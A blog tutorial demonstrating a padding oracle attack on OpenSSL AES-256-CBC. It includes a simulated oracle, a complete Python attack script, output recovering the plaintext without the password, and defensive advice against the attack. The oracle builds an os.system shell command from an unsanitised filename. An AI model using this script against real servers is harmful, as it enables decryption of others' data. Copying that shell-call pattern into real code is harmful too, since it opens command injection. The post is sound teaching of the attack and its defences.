[Crypto][Python] Padding oracle attack: demonstration

First, please first read my previous blog post about PKCS#7 padding.

So what is 'oracle'?

In our case, 'oracle' is a remote server or a piece of hardware, like smart card. We can send (modified) ciphertext to it and get an error message if padding is invalid (true/false). We don't even need decrypted plaintext from 'oracle'.

This 'oracle' term was borrowed not from computer science 'oracle'. But from 'test oracle'.

The essence of attack

Here I highlighted (in red) some parts on the well-known picture from Wikipedia:

In short: modifying the last byte of previous ciphertext block, we can alter the last byte of the last plaintext block.

Enumerating 256 bytes, we can find the moment, when the last plaintext byte will be equal to 1. OpenSSL will not report error in this case, because that would be a valid padding.

By observing that fact, we can conclude, that X XOR last_byte_from_encryption_function = 1. Or, last_byte_from_encryption_function = X XOR 1. And this is without knowing the key!

Now this is a very important fact because we can now decrypt last plaintext byte, which is: last_byte_from_encryption_function XOR original_last_byte_from_previous_ciphertext_block.

Again, using this information we can alter last byte from previous ciphertext block so that last byte of plaintext of last block will be 2. And the enumerate all possible pen-ultimate bytes.

Using this method, all 16 bytes of plaintext can be recovered using at most 256*16=4096 calls to 'oracle' or remote server.

Preparing test data

% xxd -g 1 test2.txt
00000000: 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64 21 20 48 6f  Hello, world! Ho
00000010: 6c 61 2c 20 6d 75 6e 64 6f 21 20 47 75 74 65 6e  la, mundo! Guten
00000020: 20 54 61 67 21 0a                                 Tag!.

% openssl aes-256-cbc -pbkdf2 -in test2.txt -out test2.txt.enc -pass pass:1234

Let's try to decrypt this file without password.

Our 'oracle'

#!/usr/bin/env python3

# Simulate remote server.

# All it does: takes input file as encrypted and tries to decrypt.
# Returns 0 in case of success or 1 in case of invalid padding.

import sys, os

input_fname=sys.argv[1]

# OpenSSL outputs decrypted file. but we redirect it to /dev/null, for the sake of demonstration.
# Yes, password is known (hardcoded here), but not accessible to attacker.
os.system("openssl aes-256-cbc -d -pbkdf2 -in "+input_fname+" -out /dev/null -pass pass:1234 2> log")
size=os.path.getsize("log")
os.unlink("log")
if size==0:
    # Empty log file, decryption OK.
    exit (0)
else:
    # Invalid padding.
    exit (1)

Our attacking script

It only calls oracle.py with modified ciphertext. My code is far from perfect. Uses primitive backtracking. Can be optimized. But it works!

#!/usr/bin/env python3

import os, copy, sys

def xor_two_bytes(b1, b2):
    return bytes(a ^ b for a, b in zip(b1, b2))

def put_to_bytes(buf, buf_idx, new_buf):
    for i in range(len(new_buf)):
        buf[buf_idx+i]=new_buf[i]

def int_to_bytes(i):
    return i.to_bytes(1, byteorder="big")

oracle_calls=0

# in bytes
AES_BLK_SIZE=16

# prev_cblk_last_byte_idx: index of the last byte in ciphertext of previous block. Then it decrements (during recursion)
# assumed_last_plaintext_bytes: most probable bytes of plaintext, grows
# last_blk_known_outs: known bytes that last encryption function (AES) outputs in the last block, grows
# search_for: padding byte we're looking for, starting at 0x01, up to 0x10 (increased during recursion)
def try_padding_bytes(prev_cblk_last_byte_idx, buf, assumed_last_plaintext_bytes, last_blk_known_outs, search_for):
    global oracle_calls
    #print ("len(buf)", len(buf))
    #print ("prev_cblk_last_byte_idx=", prev_cblk_last_byte_idx)
    print ("assumed_last_plaintext_bytes=", assumed_last_plaintext_bytes)
    if len(assumed_last_plaintext_bytes)==AES_BLK_SIZE:
        return True # stop
    assert prev_cblk_last_byte_idx>=0
    last_byte_prev_cblk=buf[prev_cblk_last_byte_idx]
    #print ("last_byte_prev_cblk: 0x%02x" % buf[prev_cblk_last_byte_idx])

    buf_to_try=copy.deepcopy(buf)
    # try padding byte:
    for i in range(256):
        # First I tempted to write this. But this was a mistake. Do not skip byte even if you don't modify buf.
        # So I'm leaving this commented, just to remember:
        #if buf[prev_cblk_last_byte_idx]==i:
        #    continue
        buf_to_try[prev_cblk_last_byte_idx]=i
        f=open("try", "wb")
        f.write(buf_to_try)
        f.close()
        # Call oracle. Or connect to remote server and send modified ciphertext:
        rt=os.system("./oracle.py try")
        os.unlink("try")
        oracle_calls=oracle_calls+1
        if rt==0:
            #print ("success with pad byte 0x%02x" % i)

            # At this point we know that the last plain blk is either ... 01
            #                                                or    ... 02 02
            #                                                or ... 03 03 03
            #                                                ...
            #                                                or    10 ... 10 (16 bytes)

            # assume last plain byte is $search_for$:
            last_byte_after_last_dercypt=i ^ search_for
            #print ("last_byte_after_last_dercypt: 0x%02x" % last_byte_after_last_dercypt)
            last_plain_byte=last_byte_prev_cblk ^ i ^ search_for
            #print ("last plain byte: 0x%02x" % last_plain_byte)
            last_blk_known_outs_new=int_to_bytes(last_byte_after_last_dercypt) + last_blk_known_outs
            # Prepare a new buf for recursive call (so to preserve our current buf as is):
            buf2=copy.deepcopy(buf)
            new_prev_blk=xor_two_bytes(last_blk_known_outs_new, len(last_blk_known_outs_new)*int_to_bytes(search_for+1))
            put_to_bytes(buf2, len(buf)-AES_BLK_SIZE-len(new_prev_blk), new_prev_blk)
            if try_padding_bytes(prev_cblk_last_byte_idx-1, buf2, int_to_bytes(last_plain_byte)+assumed_last_plaintext_bytes, last_blk_known_outs_new, search_for+1):
                return True # stop
    return False # continue

# blk_n=-1 for the last block
# blk_n=-2 for the penultimate block
# etc
# ... like in Python: s[-1] is the last character, s[-2] - penultimate character
def decrypt_blk(buf, blk_n):
    print ("decrypt_blk", blk_n)
    # Find last byte of previous blk:
    prev_cblk_last_byte_idx=(len(buf)+blk_n*AES_BLK_SIZE)-1
    if blk_n==-1:
        rt=try_padding_bytes(prev_cblk_last_byte_idx, buf, b"", b"", 1)
    else:
        # Also slice buf to remove unneded blocks at the end we don't want to handle:
        rt=try_padding_bytes(prev_cblk_last_byte_idx, buf[:(blk_n+1)*AES_BLK_SIZE], b"", b"", 1)

    if rt==False:
        print ("Error. Can't find anything in this block.")

f=open(sys.argv[1], "rb")
buf=bytearray(f.read())
f.close()

# Try to decrypt last 3 blocks:
decrypt_blk(buf, -1)
decrypt_blk(buf, -2)
decrypt_blk(buf, -3)

print ("oracle_calls=", oracle_calls)
% ./find_plaintext.py test2.txt.enc

decrypt_blk -1
assumed_last_plaintext_bytes= b''
assumed_last_plaintext_bytes= b'\x01'
assumed_last_plaintext_bytes= b'\n'
assumed_last_plaintext_bytes= b'\n\n'
assumed_last_plaintext_bytes= b'\n\n\n'
assumed_last_plaintext_bytes= b'\n\n\n\n'
assumed_last_plaintext_bytes= b'\n\n\n\n\n'
assumed_last_plaintext_bytes= b'\n\n\n\n\n\n'
assumed_last_plaintext_bytes= b'\n\n\n\n\n\n\n'
assumed_last_plaintext_bytes= b'\n\n\n\n\n\n\n\n'
assumed_last_plaintext_bytes= b'\n\n\n\n\n\n\n\n\n'
assumed_last_plaintext_bytes= b'\n\n\n\n\n\n\n\n\n\n'
assumed_last_plaintext_bytes= b'\n\n\n\n\n\n\n\n\n\n\n'
assumed_last_plaintext_bytes= b'!\n\n\n\n\n\n\n\n\n\n\n'
assumed_last_plaintext_bytes= b'g!\n\n\n\n\n\n\n\n\n\n\n'
assumed_last_plaintext_bytes= b'ag!\n\n\n\n\n\n\n\n\n\n\n'
assumed_last_plaintext_bytes= b'Tag!\n\n\n\n\n\n\n\n\n\n\n'
assumed_last_plaintext_bytes= b' Tag!\n\n\n\n\n\n\n\n\n\n\n'
decrypt_blk -2
assumed_last_plaintext_bytes= b''
assumed_last_plaintext_bytes= b'n'
assumed_last_plaintext_bytes= b'en'
assumed_last_plaintext_bytes= b'ten'
assumed_last_plaintext_bytes= b'uten'
assumed_last_plaintext_bytes= b'Guten'
assumed_last_plaintext_bytes= b' Guten'
assumed_last_plaintext_bytes= b'! Guten'
assumed_last_plaintext_bytes= b'o! Guten'
assumed_last_plaintext_bytes= b'do! Guten'
assumed_last_plaintext_bytes= b'ndo! Guten'
assumed_last_plaintext_bytes= b'undo! Guten'
assumed_last_plaintext_bytes= b'mundo! Guten'
assumed_last_plaintext_bytes= b' mundo! Guten'
assumed_last_plaintext_bytes= b', mundo! Guten'
assumed_last_plaintext_bytes= b'a, mundo! Guten'
assumed_last_plaintext_bytes= b'la, mundo! Guten'
decrypt_blk -3
assumed_last_plaintext_bytes= b''
assumed_last_plaintext_bytes= b'\xb9'
Error. Can't find anything in this block.
oracle_calls= 4692

'\n' is the original padding byte (0x0a) from the encrypted ciphertext -- there are 10 of these bytes. We found it too. Also, the '\n' byte is the last byte in plaintext.

Wow, I cracked OpenSSL without password! Isn't it cool? But I did this with the help of 'invalid padding' error.

Slow, yes. OpenSSL was called 4692 times, to get 32-byte plaintext. But doable, even via slow Internet, even on slow hardware. Doable even if you want to decrypt large files.

And of course, even couple of leaked plaintext bytes may be of critical importance.

First block can be decrypted as well, but only if you can control IV (i.e., send modified IV to remote server/oracle).

Modified slightly, my Python script can be used against real vulnerable servers.

Moral of the story

The error about invalid padding must not be exposed. Yes, OpenSSL and other crypto APIs return this error. But this error is intended for programmers, cryptographers, sysadmins, for their use.

End users/clients/attackers should see either 'decryption successfull'-style message or 'decryption failed, check cabling/contact support'-style message. Of course, MAC must be used as well.

Also, these days, other encryption modes are more popular: CTR and GCM. They do not require padding. (But they have other quirks, though.)

The attack works with any block cipher, not just AES.

All the files

Here.

Comments

Reddit: 1, 2, 3.

(the post first published at 20230105.)


List of my other blog posts.

Subscribe to my news feed

Yes, I know about these lousy Disqus ads. Please use adblocker. I would consider to subscribe to 'pro' version of Disqus if the signal/noise ratio in comments would be good enough.